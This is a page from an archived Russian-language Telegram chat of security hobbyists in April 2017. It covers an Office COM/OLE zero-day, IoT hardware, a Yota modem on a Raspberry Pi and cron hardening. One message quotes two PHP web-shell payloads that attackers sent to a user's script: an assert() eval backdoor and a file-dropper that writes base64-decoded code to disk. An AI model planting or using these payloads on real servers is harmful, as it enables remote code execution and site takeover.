@DC7499

Страница 652 из 1477
 
User
11.04.2017
13:02:00
это единственный COM/OLE который может грузить HTA и при этом может быть десериализирован из офисного документа

 
Vladusha
11.04.2017
13:02:01
Ну перебрать руками реально

 
User
11.04.2017
13:02:27
я специально только что посмотрел в логах своей тулзы которая анализирует attack surface

 
Vladusha
11.04.2017
13:02:28
это единственный COM/OLE который может грузить HTA и при этом может быть десериализирован из офисного документа
Ну наверное не единственный, если не он?

Google
 
User
11.04.2017
13:02:47
c хуя-ли не он? инфы пока нет

 
подождем пока будут самплы

 
Vladusha
11.04.2017
13:03:08
Ну

 
В паблике нет

 
На самом деле ребятки из файрая сами виноваты что будут эксплуатировать

 
Выпустили статейку, словили хайпа

 
Если бы промолчали до патча хотя бы, все было бы относительно ок

 
User
11.04.2017
13:10:12
да пофиг, itw постоянно какие-то 0деи эксплуатируют

 
одним больше, одним меньше

 
жаль конечно что эту тему так активно педалируют, майкросот может подсуетиться с mitigations и все что касается com/ole пойдет по пизде так же, как когда-то пошли исполнение JS кода в офисных документах, спрей исполняемой памяти через ActiveX и другие прикольные техники

 
MERRON
11.04.2017
13:16:14


 
shadowsoul
11.04.2017
13:16:58
логгер какой-то с радиоканалом

 
User
11.04.2017
13:17:51
какой-то модный internet of shit девайс

Google
 
shadowsoul
11.04.2017
13:18:37
маркировку чипов сфоткай

 
MERRON
11.04.2017
13:19:43
маркировку чипов сфоткай
не моя фотка %) с другом обсуждаем может ли это в будущем быть жучком с микрофоном

 
shadowsoul
11.04.2017
13:20:42
там вроде светик сверху, даж не барометр

 
если по интерфейсам получится навесить сверху и переписать прошивку - так себе, залупа с микрофоном получится

 
MERRON
11.04.2017
13:24:10
ага, спасибо

 
shadowsoul
11.04.2017
13:24:21
обращайтесь =^,..,^=

 
Anya
11.04.2017
14:58:33
Гайс, кто нибудь дружил малину с йотой?

 
Rassim
11.04.2017
15:04:45
Гайс, кто нибудь дружил малину с йотой?
А в чём проблема?

 
eas7
11.04.2017
15:06:11
Гайс, кто нибудь дружил малину с йотой?
https://code.google.com/archive/p/madwimax/

 
Anya
11.04.2017
15:08:24
Нет, madwimax не работает)

 
Собственно в этом и проблема

 
root@localhost
11.04.2017
15:12:27
Нет, madwimax не работает)
Обратись на @exstrasensesru. А тут лично мне хотелось бы знать на каком дистре оно не работает? В чем именно оно не работает, какие ошибки?

 
Anya
11.04.2017
15:15:18
Обратись на @exstrasensesru. А тут лично мне хотелось бы знать на каком дистре оно не работает? В чем именно оно не работает, какие ошибки?
Rapsbian, устройство получает адрес, можно проверить статистику, обратившись к йоте по серому айпи, но не по status.yota.ru. Интернете соответственно недоступен

 
root@localhost
11.04.2017
15:16:46
Nslookup status.yota.ru что говорит?

 
Anya
11.04.2017
15:20:14
Ничего хорошего)

 
Проблему уже решили другим путём)) всем спасибо))

 
shadowsoul
11.04.2017
15:21:02
ужасно хуёво задан вопрос был

 
Anya
11.04.2017
15:23:05
Ггг)) ну извините

 
yar1k
11.04.2017
16:03:00
А какой ответ на вопрос?

 
User
11.04.2017
16:38:07
> @pr3ttypin3appl3 Нет, madwimax не работает) а он вообще работает с современными модемами йота? там много лет уже lte а не wimax

Google
 
User
11.04.2017
16:40:38
https://github.com/ago/madwimax -- репу посмотрите, он обновлялся последний раз 6 лет назад

 
современные lte модемы йоты скорее всего (у меня их нет и я не знаю) через usb ethernet работают

 
madwimax мы когда-то давно запускали на роутере потому что wimax от йоты был самым первым интернет каналом московского хакспейса с первых дней аренды помещения когда он только появился, хе-хе потом когда йота гасила свою wimax сеть я обменял у них старый модем на новый lte-шный и мы его распотрошили что бы посмотреть что тамза чипсет и как оно сделано

 
)3)2☣(V)
12.04.2017
06:14:04
почитал коменты, вопрос снят))

 
ia
12.04.2017
07:42:05
Привет. посоветуйте. мн нужна крон такска, которая будет выполнять скрипт. при этом, с учетом того, что это деньги 1. возможно ли как-то усложнить возможность редактирования крона (как минимум отключение моей таски и добавление новой) 2. засекурить скрипт сам от модификации. все это на случай компрометации и получения доступа к серверу. ну хотя бы от обычного пользователя, от рута не спастись в целом...
<slowpoke mode> chattr +i /etc/crontab Главное - самому потом не забыть.

 
Andrey
12.04.2017
08:38:43
<?php assert (stripslashes( $_REQUEST [R01])); ?>
print @file_put_contents($_POST["folder"].DIRECTORY_SEPARATOR.$_POST["shell_fn"], base64_decode($_POST["scode"])) ? "____----09999999658hgjGGGGGGGGGGGGGGGGEwt43634643633443346dfhgjfggj"."f" : "____----09999999658hgjGGGGGGGGGGGGGGGGEwt43634643633443346dfhgjfggj"."f1";

 
вот чо хакеры шлют в ентот скрипт :)

 
Шиштош
12.04.2017
10:13:32
http://www.rafayhackingarticles.net/2014/08/remote-code-execution-in-php-explained.html http://www.rafayhackingarticles.net/2014/09/indepth-code-execution-in-php-part-two.html 1000 и 1 способ рце в пхп %)


 
Mops submission в референсе улыбнуло

 
Evgeniy
12.04.2017
10:15:34
Журналист Bleeping Computer Каталин Кимпану обнаружил на одном из подпольных форумов информацию о сайте LeakedSource, который был заново запущен в доменной зоне .ru. На самом LeakedSource.ru указано, что данный веб-ресурс – это продолжение оригинальной версии. По словам администраторов сайта, они сменили провайдера и регистратора доменных имен. В то же время была утрачена часть контента и потерян доступ к старым серверам и доменам. Как утверждает Кимпану, LeakedSource.ru не является фишинговым и на самом деле дает доступ к утекшей информации.
Пригтрело с отсутствия бекапов

 
Вот я некропостер)

 
Дмитрий
12.04.2017
10:22:14
а кто нибудь знает авторов бота @wifimapbot ?

 
Дмитрий
12.04.2017
10:22:19
а то чот сломался бот(

 
Кот Вася
12.04.2017
10:32:47
а кто нибудь знает авторов бота @wifimapbot ?
@Narrator69

 
Flamer
12.04.2017
11:14:22
а то чот сломался бот(
а он работал?

 
Дмитрий
12.04.2017
11:16:48
а он работал?
конечно

 
как только появился я даже пользовался

 
w9w
12.04.2017
12:22:17
Ну конечно, лучше удалить мем, а то чувства ctfшников недайбог задену(

Admin
ERROR: S client not available

 
Пингвиныч
12.04.2017
15:01:24
Здрасьте.

Google
 
MERRON
12.04.2017
15:02:53
Здрасьте.
Доброго времени

 
barborigmus
12.04.2017
15:02:55
не то чтобы здесь было не принято здороваться, но все приветствия всё равно потрет модератор, поэтому здравствуй, птица.

 
Ivan
12.04.2017
15:06:10
не то чтобы здесь было не принято здороваться, но все приветствия всё равно потрет модератор, поэтому здравствуй, птица.
А меррон это кто?

 
MERRON
12.04.2017
15:07:07
А меррон это кто?
Добрый модератор

 
Ivan
12.04.2017
15:08:15
Добрый модератор
Но модератор же

 
witn3ss
12.04.2017
15:10:00
Здрасьте.
привеет

 
Fuuss ?
12.04.2017
15:10:29
Привет

 
L1TH1UM
12.04.2017
15:39:22
А я тоже добрый модератор

 
shadowsoul
12.04.2017
15:39:56
А я тоже добрый модератор
и фыр на тебя

 
yugoslavskiy
12.04.2017
15:39:59
чот не припомню чтобы кто-то тер приветствия

 
L1TH1UM
12.04.2017
15:40:15
и фыр на тебя
Ффффф

 
barborigmus
12.04.2017
15:40:41
После приветствий иногда начинается флуд, под горячую руку так сказать.

 
L1TH1UM
12.04.2017
15:42:06
Кстати, у меня родился вопрос

 
Кот Вася
12.04.2017
15:43:51
После приветствий иногда начинается флуд, под горячую руку так сказать.
никогда такого не видел

 
L1TH1UM
12.04.2017
15:44:30
Мне, допустим, нужна какая либо информация про аппаратные уязвимости, классификации, я прошерстила гугла, но ничего приятного не нашла, все склоняется к конкретике и достаточно узкой. Есть ли на примете какие нибудь КРАЙНЕ ОБОЩЕННЫЕ статьи?

 
shadowsoul
12.04.2017
15:45:39
Мне, допустим, нужна какая либо информация про аппаратные уязвимости, классификации, я прошерстила гугла, но ничего приятного не нашла, все склоняется к конкретике и достаточно узкой. Есть ли на примете какие нибудь КРАЙНЕ ОБОЩЕННЫЕ статьи?
хуёво-с

 
L1TH1UM
12.04.2017
15:48:11
хуёво-с
Полный отстой

 
Дмитрий
12.04.2017
15:52:35
Мне, допустим, нужна какая либо информация про аппаратные уязвимости, классификации, я прошерстила гугла, но ничего приятного не нашла, все склоняется к конкретике и достаточно узкой. Есть ли на примете какие нибудь КРАЙНЕ ОБОЩЕННЫЕ статьи?
типа vulners , только для хардвари?

 
User
12.04.2017
15:53:05
> @N3M351DA Мне, допустим, нужна какая либо информация про аппаратные уязвимости, классификации, я прошерстила гугла, но ничего приятного не нашла, все склоняется к конкретике и достаточно узкой. Есть ли на примете какие нибудь КРАЙНЕ ОБОЩЕННЫЕ статьи? аппаратные уязвимости вообще вещь расплывчатая

 
оно идет бок о бок с platform security, firmware security и много чем еще

Google
 
User
12.04.2017
15:53:39
обобщать там осбо нечего и наверное незачем

 
L1TH1UM
12.04.2017
15:54:30
Меня интересует исключительно текст, как бэ

 
User
12.04.2017
15:55:09
что именно тебе нужно? platform security? ic security? firmware security?

 
eas7
12.04.2017
19:30:02
эх ребята

 
жизнь проходит а главный сплоит атк и не написан

 
User
12.04.2017
19:57:03
а если главный сплойт таки будет написан -- то это будет означать что жизнь уже пройдена что еще более печально

Страница 652 из 1477